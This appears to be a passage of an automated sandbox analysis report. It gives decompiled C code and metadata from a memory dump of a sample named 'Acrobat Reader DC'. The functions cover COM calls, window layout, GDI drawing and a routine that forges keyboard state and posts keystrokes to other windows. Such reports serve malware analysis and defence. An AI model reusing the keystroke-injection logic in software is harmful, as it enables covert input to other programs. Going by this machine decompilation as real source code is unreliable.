                                  				signed int _t265;
                                  				void* _t266;
                                  				void* _t267;
                                  				void* _t268;
                                  				void* _t275;
                                  
                                  				_t275 = __fp0;
                                  				_t240 = _a16;
                                  				_t263 =  *(_a24 + 8);
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v28 = 0;
                                  				_v24 = 0;
                                  				_v40 = 0xfffffffd;
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_a19 = 0;
                                  				if(_t240 == 0 || _a12 == 0 || _a20 == 0) {
                                  					return E00451B42(_a4, 1, 0, L"NULL Pointer assignment", 1);
                                  				} else {
                                  					if(E00432416(_t240) != 0) {
                                  						_t264 =  *( *_t240 + 8);
                                  						__eflags = _t264;
                                  						if(_t264 != 0) {
                                  							_v236 = 0;
                                  							_t152 = E00441EBA(_t264, _a20,  &_v12);
                                  							_t268 = _t267 + 0xc;
                                  							__eflags = _t152;
                                  							if(_t152 >= 0) {
                                  								__eflags = _a8 - 1;
                                  								if(__eflags == 0) {
                                  									_t194 = _v12;
                                  									_a8 = 3;
                                  									__eflags = _v12;
                                  									if(__eflags != 0) {
                                  										_t195 = E00451D2B(_t264, _t194, _a20,  &_v236);
                                  										_t268 = _t268 + 0x10;
                                  										__eflags = _t195;
                                  										if(__eflags >= 0) {
                                  											_t196 = _v232;
                                  											__eflags = _t196 & 0x00000001;
                                  											if((_t196 & 0x00000001) != 0) {
                                  												__eflags = _v224;
                                  												if(_v224 == 0) {
                                  													_a19 = 1;
                                  												}
                                  											}
                                  											__eflags = _t196 - 1;
                                  											if(__eflags == 0) {
                                  												_a8 = _t196;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								_t203 = _t263 + 1;
                                  								_push( ~(0 | __eflags > 0x00000000) | ( ~(0 | __eflags > 0x00000000) | _t203 * 0x00000010) + 0x00000004);
                                  								_t159 = E00410E53(_t263, _t264, __eflags);
                                  								__eflags = _t159;
                                  								if(_t159 == 0) {
                                  									_a20 = 0;
                                  								} else {
                                  									 *_t159 = _t203;
                                  									_t41 = _t159 + 4; // 0x4
                                  									_a20 = _t41;
                                  									E00410CA0(_t263 + 1, 0x437095, _t41, 0x10);
                                  								}
                                  								_t204 = 0;
                                  								__eflags = _t263;
                                  								if(_t263 != 0) {
                                  									_t259 = _t263 + _t263;
                                  									__eflags = _t259;
                                  									_t49 = _t259 * 8; // -16
                                  									_v8 = _a20 + _t49 - 0x10;
                                  									do {
                                  										E00479714( *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)), _t263, _t275, _v8,  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)));
                                  										_v8 = _v8 - 0x10;
                                  										_t204 = _t204 + 1;
                                  										__eflags = _t204 - _t263;
                                  									} while (_t204 < _t263);
                                  								}
                                  								__eflags = _v236;
                                  								if(_v236 != 0) {
                                  									_t186 = 0;
                                  									_v8 = 0;
                                  									__eflags = _t263;
                                  									if(_t263 != 0) {
                                  										_t63 = (_t263 + _t263) * 8; // -16
                                  										_t207 = _a20 + _t63 - 0x10;
                                  										do {
                                  											__eflags =  *((short*)(_t266 + _t186 * 4 - 0xd6)) - 2;
                                  											if( *((short*)(_t266 + _t186 * 4 - 0xd6)) == 2) {
                                  												__imp__#9(_t207);
                                  												_t188 = _v8;
                                  												 *_t207 =  *((intOrPtr*)(_t266 + _t188 * 4 - 0xd8));
                                  												_t257 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t188 * 4));
                                  												__eflags =  *((intOrPtr*)(_t257 + 8)) - 6;
                                  												if( *((intOrPtr*)(_t257 + 8)) != 6) {
                                  													 *((intOrPtr*)(_t207 + 8)) = _t207;
                                  												}
                                  											}
                                  											_t186 = _v8 + 1;
                                  											_t207 = _t207 - 0x10;
                                  											_v8 = _t186;
                                  											__eflags = _t186 - _t263;
                                  										} while (_t186 < _t263);
                                  									}
                                  								}
                                  								_t205 = _a8;
                                  								_v28 = _t263;
                                  								_v36 = _a20;
                                  								__eflags = _t205 & 0x0000000c;
                                  								if((_t205 & 0x0000000c) != 0) {
                                  									_v24 = 1;
                                  									_v32 =  &_v40;
                                  								}
                                  								__imp__#8( &_v60);
                                  								E00412F40( &_v92, 0, 0x20);
                                  								__eflags = _a19;
                                  								if(_a19 == 0) {
                                  									_push( &_v20);
                                  									_push( &_v92);
                                  									_push( &_v60);
                                  									_push( &_v36);
                                  									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
                                  								} else {
                                  									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
                                  									_push( &_v20);
                                  									_push( &_v92);
                                  									_push(0);
                                  									_push( &_v36);
                                  								}
                                  								_t166 =  *_t217(_t264, _v12, 0x482a18, 0x800, _t205);
                                  								__eflags = _t166 - 0x80020003;
                                  								if(_t166 != 0x80020003) {
                                  									L38:
                                  									__eflags = _t166;
                                  									if(_t166 >= 0) {
                                  										E00468070(_a12,  &_v60);
                                  										_t265 = 0;
                                  										__eflags = _t263;
                                  										if(_t263 != 0) {
                                  											_t172 = _t263 + _t263;
                                  											__eflags = _t172;
                                  											_t121 = _t172 * 8; // -16
                                  											_t206 = _a20 + _t121 - 0x10;
                                  											do {
                                  												__eflags = _v236;
                                  												if(_v236 == 0) {
                                  													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
                                  													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
                                  													if( *((intOrPtr*)(_t174 + 8)) == 6) {
                                  														goto L52;
                                  													}
                                  												} else {
                                  													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
                                  													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
                                  													_t221 =  *(_t266 + _t265 * 4 - 0xd8) & 0x0000ffff;
                                  													if( *((intOrPtr*)(_t174 + 8)) == 6) {
                                  														__eflags = _t221 - 0x6013;
                                  														if(_t221 != 0x6013) {
                                  															__eflags =  *(_t266 + _t265 * 4 - 0xd6) & 0x00000002;
                                  															if(( *(_t266 + _t265 * 4 - 0xd6) & 0x00000002) != 0) {
                                  																L52:
                                  																E00468070(E00432508(_t174), _t206);
                                  															} else {
                                  																__eflags = _t221 & 0x00004000;
                                  																if((_t221 & 0x00004000) != 0) {
                                  																	goto L52;
                                  																} else {
                                  																	__eflags =  *_t206 - 8;
                                  																	if( *_t206 == 8) {
                                  																		goto L52;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t265 = _t265 + 1;
                                  												_t206 = _t206 - 0x10;
                                  												__eflags = _t265 - _t263;
                                  											} while (_t265 < _t263);
                                  										}
                                  									} else {
                                  										__eflags = _t166 - 0x80020009;
                                  										if(_t166 != 0x80020009) {
                                  											goto L41;
                                  										} else {
                                  											_v16 = E00451B42(_a4, _t166,  &_v92, 0, 1);
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = _v24 - 1;
                                  									if(_v24 != 1) {
                                  										L41:
                                  										_v16 = E00451B42(_a4, _t166, 0, 0, 1);
                                  									} else {
                                  										__eflags = _t205 - 4;
                                  										_t104 = _t205 == 4;
                                  										__eflags = _t104;
                                  										_t166 =  *((intOrPtr*)( *((intOrPtr*)( *_t264 + 0x18))))(_t264, _v12, 0x482a18, 0x800, 4 + (0 | _t104) * 4,  &_v36, 0,  &_v92,  &_v20);
                                  										goto L38;
                                  									}
                                  								}
                                  								__imp__#9( &_v60);
                                  								_t168 = _a20;
                                  								__eflags = _t168;
                                  								if(_t168 != 0) {
                                  									E00470028(_t168);
                                  								}
                                  								return _v16;
                                  							} else {
                                  								return E00451B42(_a4, _t152, 0, 0, 1);
                                  							}
                                  						} else {
                                  							return E00451B42(_a4, 4, 0, L"NULL Pointer assignment", 1);
                                  						}
                                  					} else {
                                  						return E00451B42(_a4, 2, 0, L"Not an Object type", 1);
                                  					}
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E004404E8(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                  				int _v8;
                                  				int _v12;
                                  				int _v16;
                                  				signed int _v20;
                                  				struct HWND__** _v24;
                                  				signed int _v28;
                                  				void* _t152;
                                  				signed int _t153;
                                  				signed int _t159;
                                  				int _t160;
                                  				signed int _t173;
                                  				signed char _t175;
                                  				int _t176;
                                  				struct HWND__* _t179;
                                  				signed char _t181;
                                  				signed char _t186;
                                  				signed int _t189;
                                  				signed int _t201;
                                  				signed int _t207;
                                  				int _t213;
                                  				int _t214;
                                  				signed int _t218;
                                  				intOrPtr _t223;
                                  				signed int _t227;
                                  				signed int _t232;
                                  				intOrPtr _t242;
                                  				signed int _t246;
                                  				signed int _t249;
                                  				signed int _t250;
                                  				signed char _t251;
                                  				struct HWND__** _t260;
                                  				signed int _t261;
                                  				struct HWND__* _t268;
                                  				struct HWND__** _t269;
                                  				void* _t277;
                                  				void* _t295;
                                  
                                  				_t213 = _a8;
                                  				_t268 = _a4;
                                  				_t153 = E00430C09(_t152, 0x4a8630, _t268);
                                  				_t223 =  *0x4a8690; // 0x0
                                  				_t260 =  *( *(_t223 + _t153 * 4));
                                  				_v24 = _t260;
                                  				_a4 = _t260[0x11];
                                  				_a8 = _t260[0x12];
                                  				if(_t260[0x68] != 0) {
                                  					_a8 = _a8 - GetSystemMetrics(0xf);
                                  				}
                                  				if(_a4 <= 0 || _a8 <= 0 || _a12 <= 0 || _a16 <= 0 || _t213 == 1) {
                                  					return DefDlgProcW(_t268, 5, _t213, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  				} else {
                                  					_t159 = 3;
                                  					_v28 = 3;
                                  					_t277 =  *0x4a86b4 - _t159; // 0x2
                                  					if(_t277 >= 0) {
                                  						do {
                                  							_t242 =  *0x4a86a4; // 0xa51ad0
                                  							_t269 =  *( *(_t242 + _t159 * 4));
                                  							if(_t269 != 0 && _t269[1] == _t260[1] &&  *_t269 != 0) {
                                  								asm("cdq");
                                  								_t227 = _t269[0x21];
                                  								_t261 = _t269[0x21];
                                  								_v8 = _t269[0x20] * _a12 / _a4;
                                  								asm("cdq");
                                  								_v20 = _t269[0x20] * _a16 / _a8;
                                  								asm("cdq");
                                  								_v16 = _t227 * _a12 / _a4;
                                  								_t173 = _t261 * _a16;
                                  								asm("cdq");
                                  								_t246 = _t173 % _a8;
                                  								_v12 = _t173 / _a8;
                                  								_t175 = _t269[0x1f] & 0x0000ffff;
                                  								if(_t175 == 0) {
                                  									_t176 = _v20;
                                  									_t214 = _v8;
                                  								} else {
                                  									if((_t175 & 0x00000100) == 0) {
                                  										L19:
                                  										_t214 = _v8;
                                  									} else {
                                  										_v16 = _t227;
                                  										if((_t175 & 0x00000006) != 0) {
                                  											goto L19;
                                  										} else {
                                  											_t201 = _a12;
                                  											if((_t175 & 0x00000008) == 0) {
                                  												_t214 = _v8;
                                  												asm("cdq");
                                  												if(_t214 > _t201 - _t246 >> 1) {
                                  													_t218 = _a4;
                                  													_t207 = (_t218 - _t269[0x20] - _v16) * _a12;
                                  													asm("cdq");
                                  													_t246 = _t207 % _t218;
                                  													_t214 = _a12 - _t207 / _t218 - _v16;
                                  													_v8 = _t214;
                                  												}
                                  											} else {
                                  												asm("cdq");
                                  												_t214 = _t269[0x20] + (_t201 - _a4 - _t246 >> 1);
                                  												_v8 = _t214;
                                  											}
                                  										}
                                  									}
                                  									_t186 = _t269[0x1f] & 0x0000ffff;
                                  									if((_t186 & 0x00000200) == 0) {
                                  										L26:
                                  										_t176 = _v20;
                                  									} else {
                                  										_v12 = _t261;
                                  										if((_t186 & 0x00000060) != 0) {
                                  											goto L26;
                                  										} else {
                                  											_t189 = _a16;
                                  											if(_t186 >= 0) {
                                  												asm("cdq");
                                  												_t176 = _v20;
                                  												if(_t176 > _t189 - _t246 >> 1) {
                                  													_t217 = _a8;
                                  													asm("cdq");
                                  													_t214 = _v8;
                                  													_t176 = _a16 - (_a8 - _t269[0x20] - _v12) * _a16 / _t217 - _v12;
                                  												}
                                  											} else {
                                  												asm("cdq");
                                  												_t176 = _t269[0x20] + (_t189 - _a8 - _t246 >> 1);
                                  											}
                                  										}
                                  									}
                                  									_t249 = _t269[0x1f] & 0x0000ffff;
                                  									_v20 = _t249;
                                  									_t250 = _t249 & 0x00000002;
                                  									_v8 = _t250;
                                  									if(_t250 != 0) {
                                  										_t214 = _t269[0x20];
                                  									}
                                  									if((_v20 & 0x00000004) != 0) {
                                  										if(_v8 == 0) {
                                  											_t214 = _t269[0x20] + _t227 - _v16 - _a4 + _a12;
                                  										} else {
                                  											_v16 = _t227 - _t214 - _a4 + _t269[0x20] + _a12;
                                  										}
                                  									}
                                  									_t251 = _v20;
                                  									_t232 = _t251 & 0x00000020;
                                  									if(_t232 != 0) {
                                  										_t176 = _t269[0x20];
                                  									}
                                  									if((_t251 & 0x00000040) != 0) {
                                  										if(_t232 == 0) {
                                  											_t176 = _t269[0x20] + _t261 - _v12 - _a8 + _a16;
                                  										} else {
                                  											_v12 = _t261 - _t176 - _a8 + _t269[0x20] + _a16;
                                  										}
                                  									}
                                  								}
                                  								MoveWindow( *_t269, _t214, _t176, _v16, _v12, 0);
                                  								_t179 = _t269[0x22];
                                  								if(_t179 != 0) {
                                  									if(_t179 != 0x16 || (_t269[0x22] & 0x00000020) != 0) {
                                  										goto L42;
                                  									} else {
                                  										SendMessageW( *_t269, 0x469, _t269[0xc], 0);
                                  										_t181 = _t269[0x22];
                                  										if(_t181 == 0xff) {
                                  											goto L42;
                                  										} else {
                                  											_t260 = _v24;
                                  											if((_t181 & 0x000000ff) != _t260[0x65]) {
                                  												ShowWindow( *_t269, 0);
                                  											}
                                  											goto L43;
                                  										}
                                  									}
                                  									goto L51;
                                  								} else {
                                  									SendMessageW( *_t269, 0x142, 0, 0xffff);
                                  									L42:
                                  									_t260 = _v24;
                                  								}
                                  							}
                                  							L43:
                                  							_t159 = _v28 + 1;
                                  							_v28 = _t159;
                                  							_t295 = _t159 -  *0x4a86b4; // 0x2
                                  						} while (_t295 <= 0);
                                  					}
                                  					_t160 = InvalidateRect( *_t260, 0, 1);
                                  					_t260[0x62] = 1;
                                  					_t260[0xe] = 0;
                                  					return _t160;
                                  				}
                                  				L51:
                                  			}

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                  • String ID:
                                  • API String ID: 1457242333-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0044734F(void* __fp0, long* _a4, intOrPtr _a8, char _a11) {
                                  				long _v8;
                                  				struct tagPOINT* _v12;
                                  				long _v16;
                                  				long _v20;
                                  				int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v68;
                                  				void* _t97;
                                  				struct tagPOINT* _t99;
                                  				long _t100;
                                  				intOrPtr _t108;
                                  				intOrPtr _t109;
                                  				intOrPtr _t110;
                                  				void* _t112;
                                  				long* _t113;
                                  
                                  				_t113 = _a4;
                                  				_t109 = _a8;
                                  				_t100 = 0xfffffffe;
                                  				_a11 = 0;
                                  				_v20 = 0;
                                  				_v16 = 0xfffffffe;
                                  				_v24 = 1;
                                  				_v28 = _t109;
                                  				if(_t109 == 0) {
                                  					L26:
                                  					E0042FD29(_t113, _t100);
                                  					return _a11;
                                  				}
                                  				while(1) {
                                  					_v12 = 0;
                                  					E0044719B(_t113, _v20, _t100, 0, _v24);
                                  					if( *((intOrPtr*)(_t109 + 0xc)) <= 0) {
                                  						goto L25;
                                  					}
                                  					_v8 = _t109 + 0x10;
                                  					_a4 = _t109 + 0x14;
                                  					do {
                                  						_t112 =  *_v8;
                                  						_t97 = ( *(_v28 + _v12 + 0x810) & 0x000000ff) + 0xfffffff8;
                                  						if(_t97 > 0x10) {
                                  							goto L23;
                                  						}
                                  						switch( *((intOrPtr*)(( *(_t97 + 0x4475bb) & 0x000000ff) * 4 +  &M00447597))) {
                                  							case 0:
                                  								__edi = __edi | 0xffffffff;
                                  								if(_v20 != __edi) {
                                  									__edx = _v16;
                                  									__eax = E0042FD29(__esi, _v16);
                                  								}
                                  								__eax = _v8;
                                  								__eax =  *_v8;
                                  								if(__eax != __edi) {
                                  									_v20 = __eax;
                                  								}
                                  								__eax =  *_a4;
                                  								if(__eax != __edi) {
                                  									_v16 = __eax;
                                  								}
                                  								__edx = _v24;
                                  								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
                                  								goto L23;
                                  							case 1:
                                  								__edx = _v16;
                                  								_v12 =  &(_v12->x);
                                  								__eax = 8;
                                  								_a4 =  &(_a4[2]);
                                  								_v8 = _v8 + 8;
                                  								E0042FD29(__esi, _v16) = _v24;
                                  								__edx = _v20;
                                  								E0044719B(__esi, _v20, _v16, 0, _v24) = _a4;
                                  								__edx = _v8;
                                  								__eax =  *_v8;
                                  								_push( *_a4 + __ebx);
                                  								__eax =  *_v8 + __edi;
                                  								_push( *_v8 + __edi);
                                  								goto L22;
                                  							case 2:
                                  								_v12 =  &(_v12->x);
                                  								__eax = 8;
                                  								_a4 =  &(_a4[2]);
                                  								_v8 = _v8 + 8;
                                  								__eax = E0042FD29(__esi, _v16);
                                  								__edx = _v24;
                                  								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
                                  								__edx = _a4;
                                  								__eax =  *_a4;
                                  								__edx =  *_v8;
                                  								__eax =  *_a4 + __ebx;
                                  								__edx =  *_v8 + __edi;
                                  								__eax = Ellipse(__esi, __edi, __ebx,  *_v8 + __edi,  *_a4 + __ebx);
                                  								goto L23;
                                  							case 3:
                                  								__eax = MoveToEx(__esi, __edi, __ebx, 0);
                                  								__eax = _v8;
                                  								asm("fild dword [ecx+0x8]");
                                  								__edx =  *(__eax + 8);
                                  								_v12 =  &(_v12->x);
                                  								_v12 =  &(_v12->x);
                                  								_v32 = __fp0;
                                  								asm("fild dword [eax+0x10]");
                                  								__eax = __eax + 0x10;
                                  								__esp = __esp - 8;
                                  								_v68 = __fp0;
                                  								_a4 =  &(_a4[4]);
                                  								__fp0 = _v32;
                                  								_v8 = __eax;
                                  								 *__esp = __fp0;
                                  								AngleArc(__esi, __edi, __ebx, __edx, ??, ??) = LineTo(__esi, __edi, __ebx);
                                  								__eax = CloseFigure(__esi);
                                  								goto L23;
                                  							case 4:
                                  								__eax = _v24;
                                  								_t75 = __eax + 1; // 0xffffffff
                                  								__edx = __ebx + _t75;
                                  								_push(__ebx + _t75);
                                  								__ebx = __ebx - __eax;
                                  								_push(__edi + __eax + 1);
                                  								__edi = __edi - __eax;
                                  								L22:
                                  								__eax = Rectangle(__esi, __edi, __ebx, ??, ??);
                                  								goto L23;
                                  							case 5:
                                  								__eax = SetPixel(__esi, __edi, __ebx, _v20);
                                  								goto L23;
                                  							case 6:
                                  								if(_t112 != 0) {
                                  									_a11 = 1;
                                  								}
                                  								goto L23;
                                  							case 7:
                                  								_v24 = __edi;
                                  								goto L23;
                                  							case 8:
                                  								goto L23;
                                  						}
                                  						L23:
                                  						_t108 = _v28;
                                  						_a4 = _a4 + 8;
                                  						_v8 = _v8 + 8;
                                  						_t99 =  &(_v12->x);
                                  						_v12 = _t99;
                                  					} while (_t99 <  *((intOrPtr*)(_t108 + 0xc)));
                                  					_t100 = _v16;
                                  					_t109 = _t108;
                                  					L25:
                                  					_t110 =  *((intOrPtr*)(_t109 + 4));
                                  					_v28 = _t110;
                                  					if(_t110 != 0) {
                                  						_t109 = _v28;
                                  						continue;
                                  					}
                                  					goto L26;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004445F4(intOrPtr _a4, char* _a8) {
                                  				signed int _v99;
                                  				signed int _v100;
                                  				signed int _v169;
                                  				signed int _v242;
                                  				signed int _v243;
                                  				signed int _v244;
                                  				char _v260;
                                  				void* _t53;
                                  				struct HWND__* _t54;
                                  				intOrPtr _t68;
                                  				char* _t102;
                                  				intOrPtr _t103;
                                  
                                  				_t103 = _a4;
                                  				_t102 = _a8;
                                  				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
                                  					_t54 =  *(_t103 + 0x20);
                                  					if(_t54 == 0 || GetParent(_t54) == 0) {
                                  						if( *_t102 != 0) {
                                  							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 0);
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 0);
                                  						}
                                  						L43:
                                  						return E0043477C(_t103);
                                  					}
                                  					if(GetKeyboardState( &_v260) != 0) {
                                  						if( *_t102 != 0) {
                                  							_v244 = _v244 | 0x00000080;
                                  							_v100 = _v100 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 1)) != 0) {
                                  							_v244 = _v244 | 0x00000080;
                                  							_v99 = _v99 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 2)) != 0) {
                                  							_v243 = _v243 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 3)) != 0) {
                                  							_v242 = _v242 | 0x00000080;
                                  						}
                                  						if( *((char*)(_t102 + 4)) != 0) {
                                  							_v169 = _v169 | 0x00000080;
                                  						}
                                  						SetKeyboardState( &_v260);
                                  					}
                                  					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x100, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					}
                                  					if( *((char*)(_t102 + 2)) != 0) {
                                  						PostMessageW( *(_t103 + 0x20), 0x100, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					}
                                  					_t68 =  *((intOrPtr*)(_t102 + 3));
                                  					if(_t68 != 0) {
                                  						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
                                  							if(_t68 != 0) {
                                  								PostMessageW( *(_t103 + 0x20), 0x100, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  								goto L30;
                                  							}
                                  						} else {
                                  							PostMessageW( *(_t103 + 0x20), 0x104, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x20000001);
                                  							L30:
                                  						}
                                  					}
                                  					if( *((char*)(_t102 + 4)) == 0) {
                                  						goto L43;
                                  					}
                                  					PostMessageW( *(_t103 + 0x20), 0x100, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0x00000001);
                                  					return E0043477C(_t103);
                                  				} else {
                                  					return _t53;
                                  				}
                                  			}

                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
